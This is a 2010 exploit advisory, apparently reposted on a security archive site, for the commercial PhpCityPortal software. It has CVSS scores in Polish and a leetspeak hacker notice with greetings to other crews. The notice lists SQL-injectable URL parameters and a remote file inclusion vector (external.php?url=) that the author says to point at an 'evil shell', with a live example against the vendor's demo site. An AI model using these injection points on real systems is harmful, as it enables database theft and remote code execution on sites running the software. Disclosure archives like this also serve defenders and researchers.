PhpCityPortal SQL !NJECTON Vulnerability

2010.03.19
Credit: ((R3d-D3v!L))
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? [?] [~] Tybe: suffer from multi SQL !NJECTON Vulnerability [~] Vendor: phpcityportal.com [?] Software : PhpCityPortal [-] pR!CE : -PURCHASE 1 LICENSE - $149 each -PURCHASE 3 LICENSES - $119 each -PURCHASE 5 LICENSES - $99 each -PURCHASE 6 OR MORE LICENSES PLEASE CONTACT US FOR PRICING. [?] author: ((R3d-D3v!L)) [?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY [?] contact: N/A [-] [?] Date: 10.MAR.2010 [?] T!ME: 04:15 pm GMT [?] Home: WwW.xP10.ME [?] [?] [-]??????????????????????{DEV!L'5 of SYST3M}?????????????????? [*] Err0r C0N50L3: http://TARGET/P47H/video_show.php?id=SQL http://TARGET/P47H/spotlight_detail.php?id=SQL http://TARGET/P47H/real_estate_details.php?id=sql http://TARGET/P47H/auto_details.php?id=sql [~] {EV!L EXPLO!T}: [*]FORb!d3N Remote File Inclusion: [*] Err0r C0N50L3: http://TARGET/P47H/external.php?url=include your fucken evil shell [~] {EV!L EXPLO!T}: like: http://www.phpcityportal.com/demo/external.php?url=http://xp10.me N073: REAL RED DEV!L W@S h3r3 LAMERZ GAZA !N our hearts ! [~]-----------------------------{((MAGOUSH-87))}--------------------------------------- [~] Greetz tO: dolly & MERNA & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush-1987 [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ [~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4 [?]spechial SupP0RT: MY M!ND ;) & dookie2000ca &((OFFsec)) [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) [~]spechial FR!ND: 74M3M [~] !'M 4R48!4N 3XPL0!73R. [~]{[(D!R 4ll 0R D!E)]}; [~]---------------------------------------------------------------------------------------------

Referencje:

http://xforce.iss.net/xforce/xfdb/56811
http://www.securityfocus.com/bid/38649
http://www.packetstormsecurity.com/1003-exploits/phpcityportal-sqlrfi.txt
http://www.exploit-db.com/exploits/11678


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top